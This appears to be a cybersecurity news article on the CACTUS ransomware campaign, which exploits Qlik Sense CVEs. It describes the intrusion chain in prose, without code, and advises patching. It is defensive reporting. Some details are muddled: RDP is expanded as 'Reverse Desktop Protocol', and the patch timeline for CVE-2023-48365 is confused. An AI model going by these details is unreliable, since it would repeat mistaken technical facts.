Recent CACTUS Ransomware Campaign Targets Qlik Sense Vulnerabilities
A new ransomware campaign, identified as CACTUS, has been leveraging recently revealed security vulnerabilities within Qlik Sense, a cloud analytics and business intelligence platform. This operation has sparked significant concern among cybersecurity experts, marking the first known use of these vulnerabilities by threat actors to gain initial access to targeted systems.
The Arctic Wolf cybersecurity team, which is actively addressing multiple exploitation incidents related to Qlik Sense, reports that the attacks likely exploit three key vulnerabilities disclosed in the last quarter. Notably, CVE-2023-41265, with a critical CVSS score of 9.9, allows remote attackers to elevate their privileges and execute unauthorized backend requests. Additionally, CVE-2023-41266 presents a path traversal vulnerability that enables unauthenticated attackers to reach unauthorized endpoints. Another critical vulnerability, CVE-2023-48365, also scoring 9.9, results from insufficient validation of HTTP headers, allowing for remote code execution through HTTP tunneling.
Of particular interest, CVE-2023-48365 arose from an incomplete fix for CVE-2023-41265, a point recently emphasized by cybersecurity firm Praetorian. Following its initial disclosure in late August 2023, a remedial patch for CVE-2023-48365 was released on September 20, 2023. Given the ongoing exploitation of these vulnerabilities, it is imperative for organizations utilizing Qlik Sense to apply the latest security updates promptly.
Following successful exploitation, the CACTUS ransomware operators have been observed misusing the Qlik Sense Scheduler service to initiate processes designed to download additional tools for establishing persistence and enabling remote access. Among these tools are ManageEngine Unified Endpoint Management and Security (UEMS), AnyDesk, and Plink. The attackers have also removed existing security software such as Sophos, changed administrative passwords, and created Reverse Desktop Protocol (RDP) tunnels.
Ultimately, these actions culminate in the deployment of CACTUS ransomware, with threat actors employing rclone for data exfiltration. The sophistication of this ransomware campaign exemplifies the evolving landscape of cyber threats, necessitating heightened vigilance among business owners.
As the global ransomware threat continues to evolve, it is imperative to understand the broader context of these attacks. Many ransomware groups have established infrastructures that facilitate large-scale cybercriminal operations. This includes collaborating with initial access brokers and utilizing botnets to resell access to compromised systems. Recent data from industrial cybersecurity firm Dragos indicates a slight decline in ransomware attacks against industrial organizations in the last quarter. However, the reported incidents across all sectors remain alarming, underscoring that ransomware-as-a-service (RaaS) continues to thrive as a potent method for cyber extortion.
The Black Basta ransomware group has emerged as a notable player in this domain, reportedly amassing over $107 million in illicit Bitcoin payments. Their operations have been linked to other notable criminal entities, revealing a complex web of collaboration in the ransomware ecosystem.
For business owners, understanding the MITRE ATT&CK framework can provide insight into the tactics employed in these attacks. Techniques such as initial access through exploitation of public-facing applications, persistence through the use of compromised scheduled tasks, and privilege escalation via system vulnerabilities are critical to grasp as they illustrate common strategies leveraged by cyber adversaries.
In conclusion, the CACTUS ransomware campaign highlights the growing complexity of cyber threats and the imperative need for robust cybersecurity measures. Organizations must prioritize prompt application of security patches, continuous monitoring for vulnerabilities, and the adoption of a proactive cybersecurity posture to mitigate risks associated with such sophisticated attacks.
